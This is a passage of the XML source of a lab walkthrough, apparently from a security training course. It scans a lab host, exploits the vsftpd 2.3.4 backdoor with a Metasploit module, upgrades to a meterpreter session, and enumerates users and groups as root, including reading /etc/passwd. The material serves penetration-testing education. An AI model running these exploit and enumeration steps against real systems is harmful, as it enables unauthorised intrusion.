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52A99" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB01AA8" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB683D" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> Enumerate the target machine to gather users &amp; groups information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D73C7C" w14:textId="29CCF3AE" w:rsidR="00853ABF" w:rsidRDefault="008269DF">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF5E1B" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA172F" w14:textId="0E653AE6" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2513C3E3" wp14:editId="2575B4FA">
            <wp:extent cx="5943600" cy="3245485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1146931330" name="Picture 22"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ontent Imag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245485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68185D0F" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6F360" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>Perform a port scan to identify vulnerable services running on the target system. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA36511" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79692A0B" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="527EE547" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">As shown in the following screenshot, the Nmap scan reveals that the target has an FTP server running on port 21. The version column from the Nmap scan reveals that the FTP server is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> 2.3.4. This version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> is vulnerable to a backdoor command execution vulnerability and can be exploited with a Metasploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EA33E" w14:textId="10583ECB" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024EAA12" wp14:editId="01E76761">
            <wp:extent cx="5943600" cy="2296795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1892575791" name="Picture 21"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ontent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296795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39622E" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> Gaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7864B0" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>Now that we have identified the vulnerable service running on the target, we can start the Metasploit Framework console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>) and run the exploit module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB95F1" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D742EDF" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36DF47" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D207E76" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02A03C47" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835273D" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F38E4" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> If the exploit didn't work on the first try, run the exploit again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A63242" w14:textId="0CC82240" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EDF1669" wp14:editId="349CE419">
            <wp:extent cx="5943600" cy="2716530"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2002808751" name="Picture 20"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ontent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716530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2E6FF" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">You can also obtain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> session on the target system by upgrading the command shell session. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C47006" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>(Put the current session in the background.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A502C" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B29874" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F6659" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00560D66" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CA3DA" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736929A" w14:textId="14ED3920" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F6B7184" wp14:editId="0872BBD7">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139199547" name="Picture 19"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ontent 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806700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2ECD6" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="008269DF">
        <w:t> Enumerating users &amp; groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6485D8" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">Now that we have gained access to the target system and have obtained a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> session, we can begin enumerating the users &amp; groups on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F930C" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">The first piece of information that we can enumerate is the current user we have access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>to,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> this can be done by running the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E691C90" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717974AF" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B7E5C80" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>As shown in the following screenshot, we currently have access to the target system as the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF8F51" w14:textId="232FD00F" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07EECEB7" wp14:editId="4C4C38E7">
            <wp:extent cx="5943600" cy="1640840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1577568240" name="Picture 18"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ontent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640840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19D0B7" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">We can also obtain the same information manually by running the following command in a command shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6908D3" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04844260" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3076F" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66710DC1" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A299C8D" w14:textId="690A016C" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7CFC66" wp14:editId="5F63885A">
            <wp:extent cx="5943600" cy="1647190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="520274943" name="Picture 17"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ontent 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647190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967953A" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now that we have identified the user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>account</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> we have access to, we can enumerate the groups that the root user is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>prt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> of, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4C144" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E071675" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>groups root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F56EA8" w14:textId="0F4647CD" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28EBBE8E" wp14:editId="02945324">
            <wp:extent cx="5943600" cy="1556385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2097271585" name="Picture 16"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ontent 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556385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2E918" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>We can get a list of other user and service accounts on the Linux system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED4EAD3" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094187D6" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3204C56E" w14:textId="150DB2B8" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FA1DD5" wp14:editId="1CB4CE85">
            <wp:extent cx="5943600" cy="3661410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1187839102" name="Picture 15"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ontent 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661410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16D8A3" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve">We can enumerate a list </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008269DF">
        <w:t>og</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008269DF">
        <w:t xml:space="preserve"> groups present on the system by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381D097" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762BEF91" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E928F28" w14:textId="0441421C" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745762D2" wp14:editId="2B089B79">
            <wp:extent cx="5943600" cy="1683385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1797652462" name="Picture 14"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ontent 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683385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="278AA037" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>We can view the users that are currently logged in by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3117AE" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52661C71" w14:textId="77777777" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:t>who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325DF7AA" w14:textId="03C24A58" w:rsidR="008269DF" w:rsidRPr="008269DF" w:rsidRDefault="008269DF" w:rsidP="008269DF">
      <w:r w:rsidRPr="008269DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5777089A" wp14:editId="7FF20BF9">
            <wp:extent cx="5943600" cy="1675765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="204302889" name="Picture 13"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ontent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675765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
